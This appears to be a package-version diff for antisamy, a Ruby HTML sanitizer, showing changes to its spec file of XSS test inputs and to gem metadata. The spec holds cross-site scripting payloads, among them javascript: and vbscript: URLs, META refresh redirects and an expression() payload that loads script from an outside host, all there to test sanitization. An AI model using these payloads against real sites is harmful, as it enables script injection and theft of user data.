antisamy 0.2.0 → 0.2.1
Sign up to get free protection for your applications and to get access to all the features.
- data/lib/antisamy/html/sax_filter.rb +1 -1
- data/spec/antisamy_spec.rb +9 -3
- metadata +2 -2
data/spec/antisamy_spec.rb
CHANGED
@@ -85,8 +85,8 @@ module AntiSamy
|
|
85
85
|
"<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "xss",
|
86
86
|
"<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS" => "javascript",
|
87
87
|
"<IMG SRC='vbscript:msgbox(\"XSS\")'>" => "vbscript",
|
88
|
-
"<a . href=\"http://www.test.com\">" => "
|
89
|
-
"<a - href=\"http://www.test.com\">" => "
|
88
|
+
"<a . href=\"http://www.test.com\">" => " . ",
|
89
|
+
"<a - href=\"http://www.test.com\">" => "-",
|
90
90
|
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">" => "meta",
|
91
91
|
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">" => "meta",
|
92
92
|
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">" => "meta",
|
@@ -114,7 +114,7 @@ module AntiSamy
|
|
114
114
|
"<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>" => "calc.exe",
|
115
115
|
"<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->" => "javascript",
|
116
116
|
"<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">" => "<a style=",
|
117
|
-
"<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "
|
117
|
+
"<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "blur",
|
118
118
|
"<b><i>Some Text</b></i>" => "<i />",
|
119
119
|
"<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family",
|
120
120
|
"<style type=\"text/css\"><![CDATA[P { margin-bottom: 0.08in; } ]]></style>" => "margin"
|
@@ -132,5 +132,11 @@ module AntiSamy
|
|
132
132
|
r.clean_html.should_not be_empty
|
133
133
|
end
|
134
134
|
|
135
|
+
it "should not touch this url" do
|
136
|
+
input = "<a href=\"http://www.aspectsecurity.com\">Aspect Security</a>"
|
137
|
+
r = AntiSamy.scan(input,policy_object)
|
138
|
+
r.clean_html.should == input
|
139
|
+
end
|
140
|
+
|
135
141
|
end
|
136
142
|
end
|
metadata
CHANGED
@@ -2,7 +2,7 @@
|
|
2
2
|
name: antisamy
|
3
3
|
version: !ruby/object:Gem::Version
|
4
4
|
prerelease:
|
5
|
-
version: 0.2.
|
5
|
+
version: 0.2.1
|
6
6
|
platform: ruby
|
7
7
|
authors:
|
8
8
|
- Sal Scotto
|
@@ -174,7 +174,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
|
|
174
174
|
requirements:
|
175
175
|
- - ">="
|
176
176
|
- !ruby/object:Gem::Version
|
177
|
-
hash: -
|
177
|
+
hash: -3180054777523401817
|
178
178
|
segments:
|
179
179
|
- 0
|
180
180
|
version: "0"
|